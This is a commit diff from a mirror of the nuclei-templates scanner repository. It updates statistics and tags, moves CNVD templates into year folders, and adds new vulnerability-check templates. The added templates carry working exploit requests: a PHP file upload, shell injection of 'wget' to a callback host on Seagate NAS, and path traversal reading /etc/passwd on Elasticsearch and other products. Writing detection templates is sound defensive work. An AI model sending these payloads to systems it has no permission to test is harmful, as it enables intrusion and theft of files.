daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates into pr/3550

patch-1
sandeep 2022-01-19 13:25:06 +05:30
parent 4c5ca6350e 0e8b34f776
commit fd023b42a8
933 changed files with 10014 additions and 4134 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
.github/workflows/templates-stats.yml vendored
View File

@ -1,6 +1,9 @@
name: 🗒 Templates Stats
on:
push:
tags:
- '*'
workflow_dispatch:
jobs:
@ -49,4 +52,4 @@ jobs:
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}
branch: master

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 934 | daffainfo | 366 | cves | 940 | info | 948 | http | 2572 |
| lfi | 393 | dhiyaneshdk | 347 | vulnerabilities | 367 | high | 713 | file | 57 |
| panel | 334 | pikpikcu | 287 | exposed-panels | 333 | medium | 533 | network | 48 |
| xss | 291 | pdteam | 222 | technologies | 231 | critical | 332 | dns | 12 |
| wordpress | 274 | geeknik | 173 | exposures | 196 | low | 170 | | |
| exposure | 254 | dwisiswant0 | 158 | misconfiguration | 168 | | | | |
| rce | 238 | pussycat0x | 97 | token-spray | 143 | | | | |
| tech | 237 | gy741 | 92 | takeovers | 65 | | | | |
| cve2021 | 201 | 0x_akoko | 84 | default-logins | 64 | | | | |
| wp-plugin | 188 | princechaddha | 77 | file | 57 | | | | |
| cve | 960 | daffainfo | 529 | cves | 966 | info | 994 | http | 2668 |
| lfi | 401 | dhiyaneshdk | 360 | exposed-panels | 384 | high | 731 | file | 57 |
| panel | 385 | pikpikcu | 295 | vulnerabilities | 377 | medium | 547 | network | 48 |
| xss | 297 | pdteam | 241 | technologies | 214 | critical | 354 | dns | 16 |
| wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | |
| exposure | 273 | dwisiswant0 | 160 | workflows | 182 | | | | |
| rce | 253 | gy741 | 98 | misconfiguration | 182 | | | | |
| tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | |
| cve2021 | 214 | 0x_akoko | 96 | default-logins | 67 | | | | |
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |
**195 directories, 2764 files**.
**203 directories, 3004 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

2357
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 934 | daffainfo | 366 | cves | 940 | info | 948 | http | 2572 |
| lfi | 393 | dhiyaneshdk | 347 | vulnerabilities | 367 | high | 713 | file | 57 |
| panel | 334 | pikpikcu | 287 | exposed-panels | 333 | medium | 533 | network | 48 |
| xss | 291 | pdteam | 222 | technologies | 231 | critical | 332 | dns | 12 |
| wordpress | 274 | geeknik | 173 | exposures | 196 | low | 170 | | |
| exposure | 254 | dwisiswant0 | 158 | misconfiguration | 168 | | | | |
| rce | 238 | pussycat0x | 97 | token-spray | 143 | | | | |
| tech | 237 | gy741 | 92 | takeovers | 65 | | | | |
| cve2021 | 201 | 0x_akoko | 84 | default-logins | 64 | | | | |
| wp-plugin | 188 | princechaddha | 77 | file | 57 | | | | |
| cve | 960 | daffainfo | 529 | cves | 966 | info | 994 | http | 2668 |
| lfi | 401 | dhiyaneshdk | 360 | exposed-panels | 384 | high | 731 | file | 57 |
| panel | 385 | pikpikcu | 295 | vulnerabilities | 377 | medium | 547 | network | 48 |
| xss | 297 | pdteam | 241 | technologies | 214 | critical | 354 | dns | 16 |
| wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | |
| exposure | 273 | dwisiswant0 | 160 | workflows | 182 | | | | |
| rce | 253 | gy741 | 98 | misconfiguration | 182 | | | | |
| tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | |
| cve2021 | 214 | 0x_akoko | 96 | default-logins | 67 | | | | |
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |

6
cnvd/CNVD-2019-01348.yaml → cnvd/2019/CNVD-2019-01348.yaml
View File

@ -6,7 +6,7 @@ info:
severity: medium
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
tags: xiuno,cnvd
tags: xiuno,cnvd,cnvd2019
requests:
- method: GET
@ -14,14 +14,16 @@ requests:
- "{{BaseURL}}/install/"
headers:
Accept-Encoding: deflate
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "/view/js/xiuno.js"
- "Choose Language (选择语言)"
part: body
condition: and

4
cnvd/CNVD-2019-06255.yaml → cnvd/2019/CNVD-2019-06255.yaml
View File

@ -5,7 +5,7 @@ info:
author: Lark-Lab
severity: medium
reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
tags: rce,cvnd,catfishcms
tags: rce,cnvd,catfishcms,cnvd2019
requests:
- method: GET
@ -19,9 +19,9 @@ requests:
- 200
- type: word
condition: and
words:
- 'OS'
- 'PATH'
- 'SHELL'
- 'USER'
condition: and

7
cnvd/CNVD-2020-23735.yaml → cnvd/2020/CNVD-2020-23735.yaml
View File

@ -6,7 +6,7 @@ info:
severity: medium
description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information.
reference: https://www.cnvd.org.cn/flaw/show/2025171
tags: xunchi,lfi,cnvd
tags: xunchi,lfi,cnvd,cnvd2020
requests:
- method: GET
@ -18,9 +18,10 @@ requests:
- type: status
status:
- 200
- type: word
part: body
words:
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
- "display_errors"
part: body
condition: and
condition: and

5
cnvd/CNVD-2020-56167.yaml → cnvd/2020/CNVD-2020-56167.yaml
View File

@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: low
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
tags: ruijie,default-login,cnvd
tags: ruijie,default-login,cnvd,cnvd2020
requests:
- method: POST
@ -17,12 +17,11 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Level was: LEVEL15"
- "/WEB_VMS/LEVEL15/"
part: body
condition: and
- type: status

10
cnvd/CNVD-2020-62422.yaml → cnvd/2020/CNVD-2020-62422.yaml
View File

@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: medium
reference: https://blog.csdn.net/m0_46257936/article/details/113150699
tags: lfi,cnvd
tags: lfi,cnvd,cnvd2020,seeyon
requests:
- method: GET
@ -17,13 +17,15 @@ requests:
- type: status
status:
- 200
- type: word
part: header
words:
- "application/x-msdownload"
condition: and
part: header
- type: word
part: body
words:
- "ctpDataSource.password"
condition: and
part: body
condition: and

4
cnvd/CNVD-2020-68596.yaml → cnvd/2020/CNVD-2020-68596.yaml
View File

@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: critical
reference: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
tags: weiphp,lfi,cnvd
tags: weiphp,lfi,cnvd,cnvd2020
requests:
- raw:
@ -34,9 +34,9 @@ requests:
matchers:
- type: word
part: body
words:
- https://weiphp.cn
- WeiPHP
- DB_PREFIX
condition: and
part: body

3
cnvd/CNVD-2021-10543.yaml → cnvd/2021/CNVD-2021-10543.yaml
View File

@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: high
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
tags: config,exposure,cnvd
tags: config,exposure,cnvd,cnvd2021
requests:
- method: GET
@ -14,7 +14,6 @@ requests:
matchers-condition: and
matchers:
- type: regex
regex:
- "<username>(.*?)</username>"

3
cnvd/CNVD-2021-15822.yaml → cnvd/2021/CNVD-2021-15822.yaml
View File

@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: high
reference: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
tags: shopxo,lfi
tags: shopxo,lfi,cnvd,cnvd2021
requests:
- raw:
@ -16,7 +16,6 @@ requests:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"

5
cnvd/CNVD-2021-17369.yaml → cnvd/2021/CNVD-2021-17369.yaml
View File

@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: medium
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
tags: ruijie,disclosure,cnvd
tags: ruijie,disclosure,cnvd,cnvd2021
requests:
- method: GET
@ -16,12 +16,11 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<userauth>"
- "<password>"
part: body
condition: and
- type: status

4
cnvd/CNVD-2021-30167.yaml → cnvd/2021/CNVD-2021-30167.yaml
View File

@ -7,7 +7,7 @@ info:
reference:
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- https://www.cnvd.org.cn/webinfo/show/6491
tags: beanshell,rce,cnvd
tags: beanshell,rce,cnvd,cnvd2021
requests:
- raw:
@ -40,4 +40,4 @@ requests:
- type: status
status:
- 200
- 200

38
cnvd/2021/CNVD-2021-49104.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CNVD-2021-49104
info:
name: Pan Micro E-office File Uploads
author: pikpikcu
severity: critical
reference: https://chowdera.com/2021/12/202112200602130067.html
tags: pan,micro,cnvd,cnvd2021
requests:
- raw:
- |
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php"
Content-Type: image/jpeg
<?php echo md5('CNVD-2021-49104');?>
--e64bdf16c554bbc109cecef6451c26a4--
- |
GET /images/logo/logo-eoffice.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "94d01a2324ce38a2e29a629c54190f67"
- type: status
status:
- 200

1322
contributors.json Normal file
View File

File diff suppressed because it is too large Load Diff

3
cves/2001/CVE-2001-1473.yaml
View File

@ -18,7 +18,8 @@ info:
network:
- host:
- "{{Hostname}}"
- "{{Hostname}}:22"
- "{{Host}}:22"
matchers:
- type: word
words:

2
cves/2007/CVE-2007-5728.yaml
View File

@ -5,7 +5,7 @@ info:
author: dhiyaneshDK
severity: medium
description: Cross-site scripting (XSS) vulnerability in phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, different vectors than CVE-2007-2865.
tags: cve,cve2007,xss,pgadmin
tags: cve,cve2007,xss,pgadmin,phppgadmin
reference: https://www.exploit-db.com/exploits/30090
metadata:
shodan-query: 'http.title:"phpPgAdmin"'

2
cves/2008/CVE-2008-6668.yaml
View File

@ -8,7 +8,7 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
author: geeknik
severity: high
tags: nweb2fax,lfi,cve,cve2008
tags: nweb2fax,lfi,cve,cve2008,traversal
requests:
- method: GET

2
cves/2009/CVE-2009-0932.yaml
View File

@ -9,7 +9,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/16154
- https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2
tags: cve,cve2009,horde,lfi
tags: cve,cve2009,horde,lfi,traversal
requests:
- method: GET

2
cves/2009/CVE-2009-1558.yaml
View File

@ -6,7 +6,7 @@ info:
severity: high
description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
reference: https://www.exploit-db.com/exploits/32954
tags: cve,cve2009,iot,lfi
tags: cve,cve2009,iot,lfi,linksys,camera,cisco,firmware,traversal
requests:
- method: GET

4
cves/2009/CVE-2009-4202.yaml
View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/8870
- https://www.cvedetails.com/cve/CVE-2009-4202
tags: cve,cve2009,joomla,lfi
tags: cve,cve2009,joomla,lfi,photo
requests:
- method: GET
@ -24,4 +24,4 @@ requests:
- type: status
status:
- 200
- 200

4
cves/2009/CVE-2009-4679.yaml
View File

@ -8,7 +8,7 @@ info:
reference: |
- https://www.exploit-db.com/exploits/33440
- https://www.cvedetails.com/cve/CVE-2009-4679
tags: cve,cve2009,joomla,lfi
tags: cve,cve2009,joomla,lfi,nexus
requests:
- method: GET
@ -24,4 +24,4 @@ requests:
- type: status
status:
- 200
- 200

4
cves/2010/CVE-2010-0759.yaml
View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/11498
- https://www.cvedetails.com/cve/CVE-2010-0759
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,plugin
requests:
- method: GET
@ -24,4 +24,4 @@ requests:
- type: status
status:
- 200
- 200

4
cves/2010/CVE-2010-1217.yaml
View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/11814
- https://www.cvedetails.com/cve/CVE-2010-1217
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,plugin
requests:
- method: GET
@ -24,4 +24,4 @@ requests:
- type: status
status:
- 200
- 200

4
cves/2010/CVE-2010-1302.yaml
View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/11978
- https://www.cvedetails.com/cve/CVE-2010-1302
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,graph
requests:
- method: GET
@ -24,4 +24,4 @@ requests:
- type: status
status:
- 200
- 200

2
cves/2010/CVE-2010-1304.yaml
View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/11998
- https://www.cvedetails.com/cve/CVE-2010-1304
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,status
requests:
- method: GET

4
cves/2010/CVE-2010-1461.yaml
View File

@ -8,7 +8,7 @@ info:
reference: |
- https://www.exploit-db.com/exploits/12232
- https://www.cvedetails.com/cve/CVE-2010-1461
tags: cve,cve2010,joomla,lfi
tags: cve,cve2010,joomla,lfi,photo
requests:
- method: GET
@ -24,4 +24,4 @@ requests:
- type: status
status:
- 200
- 200

2
cves/2010/CVE-2010-2307.yaml
View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.securityfocus.com/bid/40550/info
- https://nvd.nist.gov/vuln/detail/CVE-2010-2307
tags: cve,cve2010,iot,lfi
tags: cve,cve2010,iot,lfi,motorola
requests:
- method: GET

2
cves/2010/CVE-2010-2861.yaml
View File

@ -8,7 +8,7 @@ info:
reference:
- https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
- http://www.adobe.com/support/security/bulletins/apsb10-18.html
tags: cve,cve2010,coldfusion,lfi
tags: cve,cve2010,coldfusion,lfi,adobe
requests:
- method: GET

2
cves/2010/CVE-2010-4231.yaml
View File

@ -8,7 +8,7 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2010-4231
- https://www.exploit-db.com/exploits/15505
tags: cve,cve2010,iot,lfi
tags: cve,cve2010,iot,lfi,camera
requests:
- method: GET

4
cves/2010/CVE-2010-4282.yaml
View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/15643
- https://www.cvedetails.com/cve/CVE-2010-4282
tags: cve,cve2010,lfi,joomla
tags: cve,cve2010,lfi,joomla,phpshowtime
requests:
- method: GET
@ -24,4 +24,4 @@ requests:
- type: status
status:
- 200
- 200

4
cves/2012/CVE-2012-0392.yaml
View File

@ -6,7 +6,7 @@ info:
severity: critical
description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
reference: https://blog.csdn.net/weixin_43416469/article/details/113850545
tags: cve,cve2012,apache,rce,struts
tags: cve,cve2012,apache,rce,struts,java
requests:
- method: GET
@ -22,4 +22,4 @@ requests:
- type: status
status:
- 200
- 200

2
cves/2012/CVE-2012-0896.yaml
View File

@ -8,7 +8,7 @@ info:
reference:
- https://packetstormsecurity.com/files/108631/
- https://www.cvedetails.com/cve/CVE-2012-0896
tags: cve,cve2012,lfi,wordpress,wp-plugin
tags: cve,cve2012,lfi,wordpress,wp-plugin,traversal
requests:
- method: GET

2
cves/2012/CVE-2012-0991.yaml
View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/36650
- https://www.cvedetails.com/cve/CVE-2012-0991
tags: cve,cve2012,lfi,openemr
tags: cve,cve2012,lfi,openemr,traversal
requests:
- method: GET

4
cves/2012/CVE-2012-1226.yaml
View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/36873
- https://www.cvedetails.com/cve/CVE-2012-1226
tags: cve,cve2012,lfi
tags: cve,cve2012,lfi,dolibarr,traversal
requests:
- method: GET
@ -24,4 +24,4 @@ requests:
- type: status
status:
- 200
- 200

2
cves/2012/CVE-2012-4878.yaml
View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/37034
- https://www.cvedetails.com/cve/CVE-2012-4878
tags: cve,cve2012,lfi
tags: cve,cve2012,lfi,traversal
requests:
- method: GET

4
cves/2012/CVE-2012-4940.yaml
View File

@ -6,7 +6,7 @@ info:
severity: high
description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI.
reference: https://www.exploit-db.com/exploits/37996
tags: cve,cve2012,axigen,lfi
tags: cve,cve2012,axigen,lfi,mail
requests:
- method: GET
@ -22,4 +22,4 @@ requests:
- "bit app support"
- "fonts"
- "extensions"
condition: and
condition: and

2
cves/2013/CVE-2013-1965.yaml
View File

@ -6,7 +6,7 @@ info:
severity: critical
description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
reference: http://struts.apache.org/development/2.x/docs/s2-012.html
tags: cve,cve2013,apache,rce,struts
tags: cve,cve2013,apache,rce,struts,ognl
requests:
- method: POST

2
cves/2013/CVE-2013-2251.yaml
View File

@ -6,7 +6,7 @@ info:
severity: critical
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized. Since said information will be evaluated as an OGNL expression against the value stack, this introduces the possibility to inject server side code.
reference: http://struts.apache.org/release/2.3.x/docs/s2-016.html
tags: cve,cve2013,rce,struts,apache
tags: cve,cve2013,rce,struts,apache,ognl
requests:
- raw:

2
cves/2014/CVE-2014-2323.yaml
View File

@ -6,7 +6,7 @@ info:
reference: https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt
author: geeknik
severity: critical
tags: cve,cve2014,sqli,lighttpd
tags: cve,cve2014,sqli,lighttpd,injection
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80

2
cves/2014/CVE-2014-2962.yaml
View File

@ -6,7 +6,7 @@ info:
severity: high
description: Path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
reference: https://www.exploit-db.com/exploits/38488
tags: cve,cve2014,lfi,router
tags: cve,cve2014,lfi,router,firmware,traversal
requests:
- method: GET

2
cves/2014/CVE-2014-3120.yaml
View File

@ -9,7 +9,7 @@ info:
reference:
- https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120
- https://www.elastic.co/blog/logstash-1-4-3-released
tags: cve,cve2014,elastic,rce
tags: cve,cve2014,elastic,rce,elasticsearch
requests:
- raw:

35
cves/2014/CVE-2014-3206.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2014-3206
info:
name: Seagate BlackArmor NAS - Command Injection
author: gy741
severity: critical
description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-3206
- https://www.exploit-db.com/exploits/33159
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2014-3206
cwe-id: CWE-20
tags: cve,cve2014,seagate,rce
requests:
- raw:
- |
GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1
Host: {{Hostname}}
Accept: */*
unsafe: true
matchers:
- type: word
part: interactsh_protocol
words:
- "http"

4
cves/2014/CVE-2014-4558.yaml
View File

@ -7,7 +7,7 @@ info:
reference: |
- https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301
- https://nvd.nist.gov/vuln/detail/CVE-2014-4558
tags: cve,cve2014,wordpress,wp-plugin,xss
tags: cve,cve2014,wordpress,wp-plugin,xss,woocommerce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
@ -34,4 +34,4 @@ requests:
- type: status
status:
- 200
- 200

4
cves/2014/CVE-2014-4561.yaml
View File

@ -7,7 +7,7 @@ info:
reference: |
- https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d
- https://nvd.nist.gov/vuln/detail/CVE-2014-4561
tags: cve,cve2014,wordpress,wp-plugin,xss
tags: cve,cve2014,wordpress,wp-plugin,xss,weather
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
@ -34,4 +34,4 @@ requests:
- type: status
status:
- 200
- 200

4
cves/2014/CVE-2014-5111.yaml
View File

@ -8,7 +8,7 @@ info:
reference: |
- https://www.exploit-db.com/exploits/39351
- https://www.cvedetails.com/cve/CVE-2014-5111
tags: cve,cve2014,lfi
tags: cve,cve2014,lfi,trixbox
requests:
- method: GET
@ -24,4 +24,4 @@ requests:
- type: status
status:
- 200
- 200

2
cves/2014/CVE-2014-9614.yaml
View File

@ -21,8 +21,8 @@ requests:
POST /webadmin/auth/verification.php HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: {{BaseURL}}/webadmin/start/
login=branding&password=branding&Submit=Login
matchers-condition: and

2
cves/2015/CVE-2015-1427.yaml
View File

@ -8,7 +8,7 @@ info:
reference:
- https://blog.csdn.net/JiangBuLiu/article/details/94457980
- http://www.elasticsearch.com/blog/elasticsearch-1-4-3-1-3-8-released/
tags: cve,cve2015,elastic,rce
tags: cve,cve2015,elastic,rce,elasticsearch
requests:
- raw:

2
cves/2015/CVE-2015-1503.yaml
View File

@ -13,7 +13,7 @@ info:
cvss-score: 7.5
cve-id: CVE-2015-1503
cwe-id: CWE-200
tags: cve,cve2015,icewarp,lfi
tags: cve,cve2015,icewarp,lfi,mail
requests:
- method: GET

2
cves/2015/CVE-2015-1880.yaml
View File

@ -30,4 +30,4 @@ requests:
- type: word
words:
- "text/html"
part: header
part: header

2
cves/2015/CVE-2015-2067.yaml
View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/35996
- https://nvd.nist.gov/vuln/detail/CVE-2015-2067
tags: cve,cve2015,lfi,magento,magmi
tags: cve,cve2015,lfi,magento,magmi,plugin
requests:
- method: GET

2
cves/2015/CVE-2015-2068.yaml
View File

@ -8,7 +8,7 @@ info:
reference:
- https://www.exploit-db.com/exploits/35996
- https://nvd.nist.gov/vuln/detail/CVE-2015-2068
tags: cve,cve2015,magento,magmi,xss
tags: cve,cve2015,magento,magmi,xss,plugin
requests:
- method: GET

7
cves/2015/CVE-2015-3306.yaml
View File

@ -6,7 +6,7 @@ info:
severity: high
reference: https://github.com/t0kx/exploit-CVE-2015-3306
description: The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
tags: cve,cve2015,ftp,rce,network
tags: cve,cve2015,ftp,rce,network,proftpd
network:
- inputs:
@ -17,13 +17,14 @@ network:
- data: "site cpfr /tmp/.{{randstr}}\r\n"
read: 1024
- data: "site cpto /var/www/html/{{randstr}}\r\n"
host:
- "{{Hostname}}:21"
- "{{Hostname}}"
- "{{Host}}:21"
read-size: 1024
matchers:
- type: word
part: raw
words:
- "Copy successful"
part: raw

2
cves/2015/CVE-2015-3337.yaml
View File

@ -6,7 +6,7 @@ info:
severity: high
description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
reference: https://www.exploit-db.com/exploits/37054/
tags: cve,cve2015,elastic,lfi
tags: cve,cve2015,elastic,lfi,elasticsearch,plugin
requests:
- method: GET

2
cves/2015/CVE-2015-3648.yaml
View File

@ -13,7 +13,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
- "{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition: and
matchers:

52
cves/2015/CVE-2015-5531.yaml Normal file
View File

@ -0,0 +1,52 @@
id: CVE-2015-5531
info:
name: ElasticSearch directory traversal vulnerability (CVE-2015-5531)
author: princechaddha
severity: high
description: Directory traversal vulnerability in Elasticsearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.
reference:
- https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531
- https://nvd.nist.gov/vuln/detail/CVE-2015-5531
tags: cve,cve2015,elasticsearch
requests:
- raw:
- |
PUT /_snapshot/test HTTP/1.1
Host: {{Hostname}}
{
"type": "fs",
"settings": {
"location": "/usr/share/elasticsearch/repo/test"
}
}
- |
PUT /_snapshot/test2 HTTP/1.1
Host: {{Hostname}}
{
"type": "fs",
"settings": {
"location": "/usr/share/elasticsearch/repo/test/snapshot-backdata"
}
}
- |
GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'ElasticsearchParseException'
- 'Failed to derive xcontent from'
- '114, 111, 111, 116, 58'
condition: and
- type: status
status:
- 400

2
cves/2015/CVE-2015-7450.yaml
View File

@ -9,7 +9,7 @@ info:
- https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py
- https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
- https://nvd.nist.gov/vuln/detail/CVE-2015-7450
tags: cve,cve2015,websphere,deserialization,rce,oast
tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80

4
cves/2015/CVE-2015-8813.yaml
View File

@ -8,7 +8,7 @@ info:
reference:
- https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2015-8813
tags: cve,cve2015,ssrf,oast
tags: cve,cve2015,ssrf,oast,umbraco
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N
cvss-score: 8.20
@ -24,4 +24,4 @@ requests:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- "http"

2
cves/2016/CVE-2016-1000137.yaml
View File

@ -5,7 +5,7 @@ info:
author: daffainfo
severity: medium
reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=658
tags: cve,cve2016,wordpress,xss,wp-plugin
tags: cve,cve2016,wordpress,xss,wp-plugin,maps
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10

2
cves/2016/CVE-2016-1000146.yaml
View File

@ -5,7 +5,7 @@ info:
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146
